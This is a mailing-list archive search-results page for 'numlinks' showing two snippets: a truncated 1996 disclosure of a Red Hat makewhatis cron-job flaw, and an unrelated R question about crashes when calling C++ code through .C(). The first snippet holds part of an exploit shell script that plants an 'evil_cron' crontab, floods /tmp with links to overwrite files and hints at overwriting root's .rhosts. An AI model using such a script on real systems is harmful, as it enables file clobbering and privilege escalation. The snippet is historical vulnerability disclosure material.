search for: numlinks

Displaying 2 results from an estimated 2 matches for "numlinks".

Did you mean: numlines
1996 Dec 24
0
Linux Redhat 4.0/3.0.3 makewhatis cron job
...ite one file a week with the whatis database. # # If someone is really clever, maybe they can overwrite ~root/.rhosts # and try IP spoofing in from ''cat'' as user ''(1)'' <smirk> # # Dave G. # <daveg@escape.com> # http://www.escape.com/~daveg # 12/21/96 NUMLINKS=100 # I dont feel like guessing. This will hit it. # Admittedly, it has as much style as a clumsy leper. if [ -x /usr/bin/crontab ] ; then cat << ! > evil_cron # These are for 3.0.3 19 03 * * 1 $PWD/overwrite $1 $NUMLINKS 00 04 * * 1 /bin/rm -f /tmp/whatis* $PWD/overwrite...
2012 Sep 20
1
R/C++ interfaces: crashes when using .c(), followed by correct results when R restarted
...sortmodel\\ mylatestversion.dll") * Next, I called equil_distC with testres2 <- .C("equil_distC", as.integer(rowmaxfiets),as.integer(colmaxfiets), as.double(nodes), as.integer(links_dist_calc), as.integer(cyclepathsfirstline), as.integer(numzones), as.integer(numnodes), as.integer(numlinks), result = double(6)) * About half of the time, whenever I had changed the C++ code, the results were either nonsensical or R crashed. * When R did not crash, I unloaded the dll with: dyn.unload("C:\\Ccodefortransortmodel\\equildistCforodpair_2012_09_20v8.dll") * Next, I deleted the .dll...